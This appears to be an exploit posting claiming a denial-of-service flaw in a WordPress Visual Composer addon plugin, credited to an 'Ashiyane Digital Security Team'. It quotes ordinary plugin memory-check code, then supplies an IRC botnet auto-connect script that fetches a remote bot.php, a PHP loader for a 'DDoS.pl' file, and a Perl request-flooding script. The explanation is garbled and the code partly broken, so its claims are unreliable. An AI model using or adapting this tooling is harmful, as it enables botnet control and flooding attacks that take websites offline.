/************************************************************************************************
[+] Exploit Title : Wordpress Crash Ultimate Addons for Visual Composer vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Tested on : Windows - Firefox
[+] Vendor Homepage : http://codecanyon.net/item/ultimate-addons-for-visual-composer/6892199
[+] Version: 3.12.0
*************************************************************************************************/
----------------------------------------
- vulnerability Ultimate_VC_Addons.php -
----------------------------------------
This Part visitors increased the pressure on the core WordPress,It is a denial of the exercise of visits
However, we try to write 0day to the target affect scenarios
Example : https://www.exploit-db.com/wp-content/plugins/Ultimate_VC_Addons/README
Our present method by transferring the channel expansion as we botnet
this is the syntax mSL that you have to your script connect to other networks.
--->
{
update_option('ultimate_vc_addons_redirect',true);
$memory = ini_get('memory_limit');
$allowed_memory = preg_replace("/[^0-9]/","",$memory)*1024*1024;
$peak_memory = memory_get_peak_usage(true);
if($allowed_memory - $peak_memory <= 14436352){
$pre = __('Unfortunately, plugin could not be activated. Not enough memory available.','ultimate_vc');
$sub = __('Please contact', 'ultimate_vc');
trigger_error( $pre.' '.$sub.' <a href="https://www.brainstormforce.com/support/">'.__('plugin support',
'ultimate_vc').'</a>.',E_USER_ERROR );
}
<---
---------------------------------------
=====================
= mSL Auto Connect: =
=====================
on *:Connect: {
/url -an www.exmple.com/bot.php
}
on *:START:{
server irc.network.com -i <nick> -j #channel,#channel
server irc.network.com -i <nick> -j #channel,#channel
}
=====================
= PHP Bot =
=====================
<?php
error_reporting(0);
$file1 = 'DDoS.pl';
$file_headers = @get_headers($file1);
if($file_headers[0] == 'HTTP/1.1 404 Not Found') {
break;
}else {
$s=file_get_contents($file1);
echo $s;
}
?>
=====================
= DDoS Perl =
=====================
#!/usr/bin/perl
#
# Title : allowed memory size exhausted
# Author : Ashiyane Digital Security Team
# Improvment Code : Und3rgr0und
use IO::Socket;
$ip="127.0.0.1";
$port="80";
$counter =0;
@attackpattern=("'");
for ($x=0;$x<=600;$x++){
$headerLine="GET /Ultimate_VC_Addons/ HTTP/1.0nn";
@temp=split(/(/)/,$headerLine);
foreach (@temp){
$replaceme=$_;
foreach(@attackpattern){
$attack=$_;
$newheaderline=$headerLine;
$newheaderline=~ s/$replaceme/$attack/i;
$remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection impossiblen";
print $remote $newheaderline;
print "nRequest: ".$counter++." t".$newheaderline."n";
$remote->close;
}
}
}
---------------------------------------
Discoverd BY : Und3rgr0und
